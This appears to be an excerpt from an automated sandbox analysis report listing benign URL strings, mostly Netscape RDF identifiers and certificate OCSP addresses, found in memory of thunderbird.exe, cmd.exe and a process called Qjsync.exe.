Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Modify.descriptionldap_2.servers.pab.descriptionabook.mab%s%s.mabcon
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Move
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#MoveFolder
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Name
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Name?sort=true
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#Checkedhttp://home.netscape.com/
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#KeyIndex
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NewFolder
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NewMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#NoSelect
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTag
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitle
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleAddressing
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleCopies
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleDiskSpace
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleFakeAccount
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleJunk
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleMain
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleOfflineAndDiskSpace
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleSMTP
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#PageTitleServer
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ProgressPercent
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ReallyDelete
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#RedirectorType
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Rename
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Server
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ServerType
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Settings
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Settingsmsgaccounts:/http://home.netscape.com/NC-rdf#PageTitleFakeAc
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SpecialFolder
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#StatusText
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribable
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Subscribed
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SupportsFilters
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SupportsOffline
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#SyncDisabled
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Synchronize
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#TotalMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#TotalUnreadMessages
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Transferred
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#URL
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Virtual
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#alwaysAsk
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#attribute
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#child
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#description
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#extension
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#extensionhttp://home.netscape.com/NC-rdf#pulsehttp://home.netscape.c
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#fileExtensions
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#handleInternal
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#open
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#path
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#persist
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#prettyName
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#pulse
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#saveToDisk
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#useSystemDefault
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#value
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#valuehttp://home.netscape.com/NC-rdf#attributehttp://home.netscape.c
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://home.netscape.com/WEB-rdf#LastModifiedDate
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
